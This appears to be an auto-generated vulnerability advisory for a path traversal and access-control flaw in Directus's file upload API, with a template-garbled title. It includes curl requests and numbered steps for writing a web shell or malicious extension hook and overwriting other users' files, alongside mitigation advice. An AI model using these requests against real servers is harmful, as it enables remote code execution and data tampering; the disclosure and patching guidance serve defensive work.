Directus, Path Traversal & Broken Access Control, Critical (CVE not specified in )

Listen to this Post

How the mentioned CVE works:

The vulnerability resides in Directus file management API endpoints `POST /files` and PATCH /files/{id}. The server accepts a user-controlled `filename_disk` parameter that should be generated internally. Attackers inject `../` sequences into `filename_disk` during file uploads, causing the application to write files outside the intended storage prefix (path traversal). For example, setting `filename_disk` to `../../config/evil.php` writes a PHP file into the webroot. Additionally, by modifying `filename_disk` to reference another user’s existing file ID (e.g., ../uploads/user123/secret.pdf), attackers overwrite legitimate files without proper access control checks. Metadata fields like `uploaded_by` can be altered to hide tampering. The API fails to normalize or validate path components, and does not verify that the resolved path remains within the designated storage directory. Combined, these flaws allow arbitrary file write and overwrite. If the storage backend shares location with Directus extensions (e.g., ./extensions), an attacker can write a malicious extension file (e.g., `hook.js` or endpoint.php) that executes arbitrary code when the server reloads extensions or a restart occurs. The attack requires no authentication if the API allows anonymous uploads, or minimal privileges otherwise. Successful exploitation leads to remote code execution, data corruption, and system compromise.

dailycve form:

Platform: Directus
Version: Unpatched versions (pre-fix)
Vulnerability: Path traversal + broken access
Severity: Critical
date: 2026-04-05

Prediction: Patch within 30 days

What Undercode Say:

Analytics

Check vulnerable endpoint (anonymous upload)
curl -X POST https://target/files \
-F "[email protected]" \
-F "filename_disk=../../public/evil.php"
Overwrite another user's file (authenticated)
curl -X PATCH https://target/files/valid_id \
-H "Authorization: Bearer $TOKEN" \
-d '{"filename_disk":"../uploads/victim/file.pdf"}'
Path traversal write outside storage
curl -X POST https://target/files \
-F "[email protected]" \
-F "filename_disk=../../../extensions/hooks/backdoor.js"

Exploit:

  1. Identify writable path via error messages or default Directus structure.

2. Upload a web shell using `filename_disk=../../public/shell.php`.

  1. If extensions directory is reachable, write malicious hook: `filename_disk=../../extensions/hooks/malicious.js` – code executes on next admin action or restart.
  2. Overwrite critical files (e.g., config.js) by referencing their relative path from storage prefix.
  3. For authenticated overwrite, list files via API, then PATCH `filename_disk` to another user’s file ID combined with path traversal to escape container.

Protection from this CVE

  • Never accept `filename_disk` from client input; generate server-side using hashed names.
  • Apply path normalization (path.resolve, filepath.Clean) and check that resolved path starts with allowed storage prefix.
  • Reject any path containing .., ./, absolute paths, or null bytes.
  • Implement strict access control: verify user ownership before allowing file metadata updates.
  • Isolate storage backend from extension and system directories; use separate volumes or containers.

Impact:

  • Unauthorized file overwrite leading to malware distribution and data corruption.
  • Storage boundary bypass – write to configuration or system folders.
  • Remote code execution when writing to extensions folder (server reloads malicious code).
  • Complete loss of data integrity – tampered files appear unmodified in UI.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top